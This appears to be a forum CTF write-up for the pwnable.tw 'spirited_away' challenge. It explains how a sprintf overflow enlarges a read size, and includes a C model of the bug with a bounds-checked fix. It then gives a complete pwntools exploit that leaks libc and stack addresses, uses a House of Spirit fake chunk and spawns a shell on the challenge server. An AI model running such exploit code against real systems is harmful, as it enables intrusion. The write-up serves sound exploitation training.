[Original] pwnable.tw - spirited_away
2018-8-21 17:14 3813
Vulnerability:
The array v1 is 0xE8-0xB0 = 0x38 bytes, i.e. 56. The string that sprintf writes into it has 54 fixed characters, and the counter cnt is formatted into it as well. cnt is a number, but printed as characters it takes one byte per digit, so once cnt reaches three digits the write overflows. v1 is a stack variable; stored after it are the variable nbytes, var_AC, the char array s, var_58, and the heap address of the char array buf. Conveniently, nbytes is the size that the read function uses when reading the user's name and comment. When cnt has three digits, the final 'n' of the string overflows into the memory of nbytes, and the char 'n' is then treated as a size_t, i.e. 0x6E = 110. So the read size for name and comment grows from the original 60 to 110, while the buffers read stores the input into, buf and s, were sized 0x3C and 0x50, so both arrays overflow.
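The length arithmetic above as an added C model; this is not the challenge binary's code, and the format string is a constructed 54-character stand-in (ending in 'n', like the one the writeup describes), not the string in the binary. It lays out a 56-byte buffer followed by the 4-byte read length, simulates the unsafe sprintf pattern in defined behaviour by copying exactly the bytes sprintf would write, and shows the snprintf-with-check replacement that refuses to keep a message that does not fit. Little-endian layout is assumed, as on the challenge's x86 target.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Constructed model of the frame described in the writeup: a 56-byte message
 * buffer (0xE8 - 0xB0 = 0x38) directly followed by the 4-byte length that
 * read() uses for name/comment. Nothing else about the binary's layout is
 * claimed; little-endian is assumed. */
struct frame {
    char v1[56];
    uint32_t nbytes;
};

/* Constructed 54-character tail ending in 'n', standing in for the binary's
 * format string, whose fixed part the writeup measures at 54 characters. */
#define FIXED_TAIL " comments so far we will review them as soon as we can"

size_t fixed_tail_len(void) { return strlen(FIXED_TAIL); }

struct frame fresh_frame(void) {
    struct frame f;
    memset(&f, 0, sizeof f);
    f.nbytes = 60;  /* the original read size the writeup quotes */
    return f;
}

/* Model of the unsafe sprintf(v1, "%d...", cnt): format into a scratch buffer,
 * then copy exactly the bytes sprintf would have written (digits + tail + NUL)
 * over the frame, clamped to the frame so the model itself stays defined.
 * Returns how many bytes sprintf would have written, terminator included. */
size_t unsafe_update(struct frame *f, int cnt) {
    char scratch[128];
    int n = snprintf(scratch, sizeof scratch, "%d" FIXED_TAIL, cnt);
    size_t written = (size_t)n + 1;
    size_t copy = written > sizeof *f ? sizeof *f : written;
    memcpy(f, scratch, copy);  /* any byte at offset 56 or beyond lands in nbytes */
    return written;
}

/* Hardened replacement: snprintf bounded to v1 alone, plus a check on the
 * return value (which excludes the terminator) so a truncated message is
 * reported instead of silently kept. nbytes can never be touched. */
int safe_update(struct frame *f, int cnt) {
    int n = snprintf(f->v1, sizeof f->v1, "%d" FIXED_TAIL, cnt);
    if (n < 0 || (size_t)n >= sizeof f->v1) {
        f->v1[0] = '\0';
        return -1;
    }
    return 0;
}

/* Helpers exposing the observable effect of each variant for a given cnt. */
uint32_t nbytes_after_unsafe(int cnt) {
    struct frame f = fresh_frame();
    unsafe_update(&f, cnt);
    return f.nbytes;
}

int safe_result(int cnt) {
    struct frame f = fresh_frame();
    return safe_update(&f, cnt);
}

uint32_t nbytes_after_safe(int cnt) {
    struct frame f = fresh_frame();
    safe_update(&f, cnt);
    return f.nbytes;
}

int main(void) {
    int samples[] = {5, 100};
    for (size_t i = 0; i < sizeof samples / sizeof samples[0]; i++) {
        int cnt = samples[i];
        size_t would_write = (size_t)snprintf(NULL, 0, "%d" FIXED_TAIL, cnt) + 1;
        printf("cnt=%3d  sprintf would write %zu bytes  nbytes(unsafe)=%u  "
               "safe_update=%d  nbytes(safe)=%u\n",
               cnt, would_write, (unsigned)nbytes_after_unsafe(cnt),
               safe_result(cnt), (unsigned)nbytes_after_safe(cnt));
    }
    return 0;
}
```

With cnt = 100 the model writes 58 bytes, so the 'n' at offset 56 becomes the low byte of nbytes and it reads back as 110, exactly the 0x6E the writeup derives; with cnt = 5 the 56 bytes fit and nbytes stays 60. The check in safe_update uses `>=` because snprintf's return value does not count the terminator, which still needs a slot; in this model the terminator alone already spills at two digits (zeroing nbytes' low byte), and the hardened version rejects that case too.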
Approach:
The object passed to free is the buf array, which lives on the heap. So we can build a fake chunk on the stack, then use the overflow to overwrite the pointer on the stack that points at buf's memory, trigger free so that our fake chunk is put into the fastbin, and finally obtain the fake chunk as the target block from malloc.
Exploit:

```python
from pwn import *


def create(name, age, reason, comment):
    # Please enter your name:
    p.recvuntil('name: ')
    p.send(name)
    # Please enter your age:
    p.recvuntil('age: ')
    p.sendline(age)
    # Why did you came to see this movie?
    p.recvuntil('movie? ')
    p.send(reason)
    # Please enter your comment:
    p.recvuntil('comment: ')
    p.send(comment)


def nextOne(choice):
    # Would you like to leave another comment? <y/n>:
    p.recvuntil('<y/n>: ')
    p.send(choice)


def exploit():
    # leaking libc
    # gdb.attach(p, 'b*0x080486F8\nc')
    create('1'*0x3c, '-2', '2'*0x18, '3'*0x3c)
    p.recvuntil('Reason: ')
    p.recvuntil('2'*0x18)
    _IO_file_sync = u32(p.recv(4)) - 7
    log.info('_IO_file_sync:' + hex(_IO_file_sync))
    # print info
    libc.address = _IO_file_sync - libc.symbols['_IO_file_sync']
    system = libc.symbols['system']
    log.info('system:' + hex(system))
    binsh_addr = next(libc.search('/bin/sh'))
    log.info('binsh_addr:' + hex(binsh_addr))
    nextOne('y')

    # leaking stack
    # gdb.attach(p, 'b*0x080486F8\nc')
    create('1'*0x3c, '-1', '2'*0x50, '3'*0x3c)
    p.recvuntil('Reason: ')
    p.recvuntil('2'*0x50)
    stack = u32(p.recv(4))
    log.info('stack:' + hex(stack))
    nextOne('y')

    # trigger stack overflow
    force = log.progress('Trigger')
    for i in range(100):
        force.status("{0}".format(i))
        create('1'*0x3c, str(i), '2'*0x50, '3'*0x3c)
        nextOne('y')

    # House of Spirit
    # gdb.attach(p, 'b *0x80488C6')
    reason = p32(0x41) + 60*'1' + p32(0x1234)
    reason = reason.rjust(0x50, '2')
    comment = '3'*0x50
    comment += p32(100)
    comment += p32(stack-0x60)
    create('1'*0x3c, '100', reason, comment)
    nextOne('y')
    payload = 'A'*68
    payload += p32(system)
    payload += p32(0xdeadbeef)
    payload += p32(binsh_addr)
    create(payload, '101', '2'*0x50, '3'*0x3c)
    nextOne('n')
    p.interactive()


if __name__ == '__main__':
    context.binary = "./spirited_away"
    context.terminal = ['gnome-terminal', '-x', 'sh', '-c']
    e = ELF('./spirited_away')
    flag = 1
    if flag:
        p = remote("chall.pwnable.tw", 10204)
        libc = ELF('./libc_32.so.6')
        exploit()
    else:
        p = process('./spirited_away')
        libc = ELF('/lib/i386-linux-gnu/libc.so.6')
        exploit()
```
Last edited on 2018-8-21 17:43 by 该用户很懒, reason: